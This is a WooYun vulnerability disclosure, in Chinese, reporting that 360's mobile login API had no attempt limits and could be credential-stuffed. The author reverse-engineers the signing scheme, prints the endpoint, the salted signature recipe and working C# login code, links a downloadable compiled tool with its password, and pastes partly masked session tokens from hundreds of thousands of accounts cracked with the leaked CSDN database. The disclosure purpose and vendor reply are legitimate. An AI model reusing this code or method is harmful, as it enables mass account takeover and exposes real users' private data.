当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106778

漏洞标题:360移动端可被破解之撞库攻击(轻松撞出几十万)

相关厂商:奇虎360

漏洞作者: 小手冰凉

提交时间:2015-04-09 12:09

修复时间:2015-05-24 13:34

公开时间:2015-05-24 13:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

逆向360移动端,破解之<撞库>
仅csdn测试公开库就撞出几十万,危害可想而知。

详细说明:

作为一个被360面试刷下来的同学,我深受打击,现在回头看看应该感谢360,让我少了些傲气多了些踏实。
进入正题,因为360的体系是一站式验证走遍各个子应用。所以我们随便选择一个360手机端程序,这里我使用的是360云盘,在手机端使用自己的账号进行登录并抓包,发现360的登陆使用的是http协议的GET方法,请求地址以及参数如下

http://login.360.cn/intf.php?method=UserIntf.login&des=1&is_keep_alive=0&from=360cloud_mobile&fields=qid&v=1.2.2&param={0}&format=json&sig={1}


经过分析{0}位置是对用户名和密码的自定义编码,sig是校验字段。
经过对改手机端的反编译找到了sig校验算法如下

sig = MD5(des=1fields=qidformat=jsonfrom=360cloud_mobileis_keep_alive=0method=UserIntf.loginparam={0}v=1.2.2f1e1d72f8)


其中仍然包含用户名和密码的自定义编码字段,然后下一步就关注这个点,跟踪string类型发现这个字段是对

username=用户名&password=md5加密的密码

这个字符串的自定义编码,最后定位到如下方法

public static String com.qihoo.yunpan.c.h.a(String str)


跟踪进入方法后,发现这个编码格式比较复杂(也可能是我不知道的某种公开编码格式),复现比较困难。那怎么办?那我直接不复现了,我直接用你的方法不就得了!当我准备好需要编码的字符串后直接传递给这个方法就行了,等他编码结束了返回给我编码后的字符串我直接用就行了。这是个java程序,虽然我也会写java程序,但是界面总不如c#来的直接,后来百度发现一个直接可以把jar包转成dll的工具,就能在c#里面直接调用了。
程序写完之后使用csdn的公开库进行测试,发现360这个私有登陆API完全没有登陆次数限制。
后面附带核心代码和测试程序。

漏洞证明:

我之前想过很多很有噱头的标题,最后想还是中肯一些。其实这个漏洞发现的时间是正好是两年之前(2013年4月),但是今天(2015.4.9)我打开利用程序仍然可以撞库。
也许你感觉这个洞有什么严重的,无非就是能和已知库撞撞。我想这样认为是不对的。
1.为什么这样一个敏感的API在最近两年各种撞库新闻的情况下竟然仍然没有做登陆次数限制,我认为原因就是太自信。开发人员认为自己为自己准备的API不可能被别人破解。这只是其中一个API,360还有很多很多API,如果不加限制被人破解也只是时间问题,即使是写入jni仍然可以反编译破解。
2.到底能撞多少出来。我这里只使用了csdn的库进行测试。结果如下(最近的这次只选择了csdn的前36w,为了节约时间)

时间:2013.4	测试数量600w	撞出494318个	比率8.2%
时间:2015.4 测试数量36w 撞出22598个 比率6.2%


这个结果是令人震惊的,首先在这两年中出现了这么多安全新闻,而那原先的8.2%没有更改过密码的人只有四分之一改了密码,这还是csdn(也就是几乎全是计算机方向的人,想想你在不在其中)。另一方面,单一的csdn库就撞出了几十万的用户,这意味着什么,数据!隐私!只看360云盘的话,假设只有一半的人有360云盘,那如果窃取这些人的数据将会是多大的数据量,多少隐私。单纯搜集岛国动作片估计一辈子都看不完了。
3.舆论影响,如果被不法分子利用,在网上弄出个什么"疑似360数据库泄露",估计股价都会波动了。ps:据说前段时间的12306撞库就是移动端API的问题
基于上面这些原因,我感觉20rank都有些低了。
下图是测试程序截图,界面比较随意,见谅

捕获.PNG


下面是一些爆破出的用户,希望管理帮忙打码

mask 区域
*****0b453d0aad0c7c8e9e3333414c%26t%3D1428525255%26lm%3D%26lf%3D1%26sk%3D2866b7d8e3de23240928a1441fc3dcc2%26mt%3D1428525255%26rc%3D%26v%3D2.0%26a%3D0","rd":"c%7BIYct-%2A%7BQCGd%2CMDjN%7B%7D%5Bm3.5%22St%3Fc5th%2CO%7DAbF%7BXR*****
*****33c301%26t%3D1428525255%26lm%3D%26lf%3D1%26sk%3D6480b92c67a856944c939422a63d457f%26mt%3D1428525255%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOF2nyA%28%28FkW%7D%3B%3E%2Cx5%2CqSs9sBBzn2k%3F%5E%24b27wH%23V%3Bj57Zj4h%29H3l4F%5B%259%27*****
*****a28e2fbe39f5677b851cd021223%26t%3D1428525254%26lm%3D%26lf%3D1%26sk%3Dd6e6b0211b1199285131778d14de6455%26mt%3D1428525254%26rc%3D%26v%3D2.0%26a%3D0","rd":"cy%20%28%22%7BiK%3C3lY%20b%26%2AgqpY%5CA.%29JYh.Z%20%7D_%7B*****
*****f7cf176fc37319a2a6c03e%26t%3D1428525254%26lm%3D%26lf%3D1%26sk%3Dc5f09f6a2a9b187bd22ce7ce869edf77%26mt%3D1428525254%26rc%3D%26v%3D2.0%26a%3D0","rd":"c%26%3Ct8T7x%26%7CBDZ2T%7C%5EW%3BA%22t6ab%26E%7B%3D%7C%27%2C%22L2Ywb*****
*****f2a40ed0199cb9ac%26t%3D1428525253%26lm%3D%26lf%3D1%26sk%3D9ea5ab491cb6d4d0bccde07a1b2bd7e0%26mt%3D1428525253%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOW%7B%3AFl%3DE%3E%5EU%3AqWz%40AF%24%3EvCF2Xx%24%40Nu%259%2F%256wTxKkl%3Al6VMH.e8m*****
*****ea53cdc0be642b1e4eb6%26t%3D1428525253%26lm%3D%26lf%3D1%26sk%3Dac8b5abb87acd804246eadfe8ec935f5%26mt%3D1428525253%26rc%3D%26v%3D2.0%26a%3D0","rd":"cy%2A%405Q9%60%29u%3A%3F%24%5Bjq3%60az%7Dek41%20d%7C1a%7D%3B3%21JL8%40O%2BnSyB%29%29-hl*****
*****088b704dd487ce87cf2f%26t%3D1428525253%26lm%3D%26lf%3D1%26sk%3D4f90fd5a4dcde38d778010a503fa4883%26mt%3D1428525253%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOW%7B%25%3ED%60le9Q%22%3Ce%3F%27b4Sa%2CGYF%2B%2A%252%3C%7CKZ%28%40xY8ekh%5Ez%4*****
*****69f04821d%26t%3D1428525252%26lm%3D%26lf%3D1%26sk%3D48595942a8386d804516feca3ea019ca%26mt%3D1428525252%26rc%3D%26v%3D2.0%26a%3D0","rd":"c%26%3C%243yT%24%7E%3Fj%23LHc%23y.q%7E%3DS%3F%3FZ%22%267_HuXL5LdP%27%27_s%3AO%3As0%20*****
*****96867eb4006b60c7a0faf914%26t%3D1428525252%26lm%3D%26lf%3D1%26sk%3D41cc5aa953cf5145c78d86ad0fd86c76%26mt%3D1428525252%26rc%3D%26v%3D2.0%26a%3D0","rd":"cCn%7E_%21qH%7Cakaa%7D%2Bjv%21WQeNV%2FW%2A%7D%20om%3AWG%7D%2BNA%40*****
*****0002099d6f7%26t%3D1428525264%26lm%3D%26lf%3D1%26sk%3Df715edde208b7934757140586eba603c%26mt%3D1428525264%26rc%3D%26v%3D2.0%26a%3D0","rd":"cy%2A%40h%7Ep6RX9%23l%27pQ%40V%40brYaN%3ENp6%210%5Bp1%29l%23k%3B%60A%26v%3Dn%2AXu%28%22XK_%5CQe%298%28*****
*****40b4ab5fc6e109b90005a62%26t%3D1428525264%26lm%3D%26lf%3D1%26sk%3D32779a6d70c893eee2d77e97da6b69c0%26mt%3D1428525264%26rc%3D%26v%3D2.0%26a%3D0","rd":"c%5BFK9aT1xG%3Dr%3DvM%5EKUC%60%3F8%5E_Rs%3D84J%3D9Y8B%3BxN%7D-%26E%7B%40W%40%29Z%27%2BR2xj-ByFu%24O%3B%2*****
*****226b358df82ed4c47ca673c0cb7%26t%3D1428525264%26lm%3D%26lf%3D1%26sk%3Deb217305a74d2438c5e9e2a7998db4f8%26mt%3D1428525264%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOW%7Brge4%24RY%5D%3F%22kFNh%28ZW%2A%24J.jQ-%3D3%26K%20X8a%3E%7E9*****
*****60c0f3061741ce%26t%3D1428525263%26lm%3D%26lf%3D1%26sk%3Dfeb8f8f04dde0e77c545536a51aa49cb%26mt%3D1428525263%26rc%3D%26v%3D2.0%26a%3D0","rd":"cq%3Ae57%23%3B%40dGPX%28Utv%2Cx_V%22.%7BkVjuC%5DMc.m4%40NkwSq0%40o%3A%25%29%7BFs0Jl*****
*****29588cfcf3bdbf9%26t%3D1428525263%26lm%3D%26lf%3D1%26sk%3D23221a1f1cc2dcc6af4be51db80c8ca4%26mt%3D1428525263%26rc%3D%26v%3D2.0%26a%3D0","rd":"c%26X8pLm3IPj9%26%3F%2Cv3tzy%20%60%2BSI%24k%24U%28h0%5Dz%3E-V%27S%60E%21k%7BBVVgB9u%403j%7B%20D*****
*****18b0303d0976c93a94d99a0%26t%3D1428525262%26lm%3D%26lf%3D1%26sk%3Dec77570e0927550de3a2bb4015a76ebb%26mt%3D1428525262%26rc%3D%26v%3D2.0%26a%3D0","rd":"cq%3Ae57%23%226pP09_%5C%24%7ECq5P.TR%3Eop1%227p4g%22aZFX26%7Eh%27Xm71*****
*****aa40d1442cbc3811848%26t%3D1428525262%26lm%3D%26lf%3D1%26sk%3D86c3161c5a01e7375d1d705586182fbd%26mt%3D1428525262%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOWQ%5DYj%2CDqu%3Ck5%60ZXM3Ltn%22Qh1%3D5lMVHnLno0d4T.2tyuFlb%22%7BD%7EBZ*****
*****00ea81bc67c40191c862408a99%26t%3D1428525260%26lm%3D%26lf%3D1%26sk%3D4cd093b99f0284f152013260d4e6f7b0%26mt%3D1428525260%26rc%3D%26v%3D2.0%26a%3D0","rd":"c3IX2%5BD%23%28MZ_Ow%60D%3FSn%28%24pP%5C3%5B%7BI%3FC9%29Yc6jT*****
*****f4f2c3c9f2bd3debcc1c7bb6e10d%26t%3D1428525260%26lm%3D%26lf%3D1%26sk%3D2b6df257e0ebdf395fd7047679802092%26mt%3D1428525260%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOm5%3A%3E%5BXQ98T%25q%25%26q5D9%7B%29%5D6A%40H68rTX5%*****
*****8e01e4860950df7448f%26t%3D1428525258%26lm%3D%26lf%3D1%26sk%3D758b61f74bf23abae70d233b2e4d245c%26mt%3D1428525258%26rc%3D%26v%3D2.0%26a%3D0","rd":"cOPKaZ-aEhQ%21%29Z.%7CwP%2F.wuI.PF%5D8%282%2C6x%21y%3BNhX%5DhZ6%7CxuJ-RvC38%5D54*****
*****2ae2286264%26t%3D1428525258%26lm%3D%26lf%3D1%26sk%3D882328902dce12c386592c2a439da520%26mt%3D1428525258%26rc%3D%26v%3D2.0%26a%3D0","rd":"c3k%3C%3Ab%7BEtn2cKwJ%205L%3Ar%3BDEMmEc%7Ep7%27%27d%29C%24%22H%23%2AW5%2FO1%7DE33%603*****
*****e173700c005eb%26t%3D1428525257%26lm%3D%26lf%3D1%26sk%3D7cac743dffcb166e55ef7667bb9ee17b%26mt%3D1428525257%26rc%3D%26v%3D2.0%26a%3D0","rd":"ci.%26%2B.Ib%23yrM%23uF%2A9v7V%5Ea%28.%7D%7D%23GQv%20Z%29N%5E%202Vsg%3EPRH%3CO%60m%5B.%7D-w%3*****
*****3313844976c8c%26t%3D1428525256%26lm%3D%26lf%3D1%26sk%3D0858cf76c9021d6d9069dde3aefc89a9%26mt%3D1428525256%26rc%3D%26v%3D2.0%26a%3D0","rd":"c3zo4s-FE68DJ%2B%2CZq%21g3L6%2A%5CnyV%27%3B-abh%2Ch1nVoLWtGZh4%3F0%5CX%3B_%7E%22n3%5Cnw9Q*****
*****cod*****


ps:我自己研究这个纯属个人娱乐,两年前的时候撞库漏洞一般是大家看不上眼的,我也就自己练练手。到了今天这个问题已经比较严重,所以发出来。我个人绝对没有做过什么破坏或者是传播。我测试的时候也是使用的自己的机器所以请求日志什么的都是能追查的。希望这个提交不会给我带来麻烦,有什么问题请私信我
vs项目下载地址,可以直接使用里面编译好的程序测试。工程中可能带有本机的一些信息,请不要社工我。
链接: http://pan.baidu.com/s/1ntzcnsl 密码: xm8p
核心代码
class Login
{
//des=1fields=qidformat=jsonfrom=360cloud_mobileis_keep_alive=0method=UserIntf.loginparam=****
static string sig1 = "des=1fields=qidformat=jsonfrom=360cloud_mobileis_keep_alive=0method=UserIntf.loginparam=";
static string sig2 = "v=1.2.2f1e1d72f8";
static string url = "http://login.360.cn/intf.php?method=UserIntf.login&des=1&is_keep_alive=0&from=360cloud_mobile&fields=qid&v=1.2.2&param={0}&format=json&sig={1}";
public static bool go(User u, out string data)
{
string uInfo = h.a(u.tostring());
string sig = Config.MD5Encrpt(sig1 + uInfo + sig2);
data = Config.HttpGet(string.Format(url, HttpUtility.UrlEncode(uInfo), sig), null);
return data.StartsWith("{\"errno\":\"0\"");
}
}
class User
{
private string username;
private string pwd;
public User(string username, string pwd)
{
this.username = username;
this.pwd =Config.MD5Encrpt(pwd);
}
public string tostring()
{
return string.Format("username={0}&password={1}", username, pwd);
}
}

修复方案:

你们更专业

版权声明:转载请注明来源 小手冰凉@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-09 13:33

厂商回复:

非常感谢白帽子的反馈。防范撞库是需要长期运营的业务安全问题,我们对此有异常IP登陆风险提示和密码错误次数限制,但目前只是做风险提示,并没有强制用户修改密码。为了更好地解决撞库问题,我们正在推行更严格的策略,将对非常用IP登陆加入验证码等限制措施。

最新状态:

暂无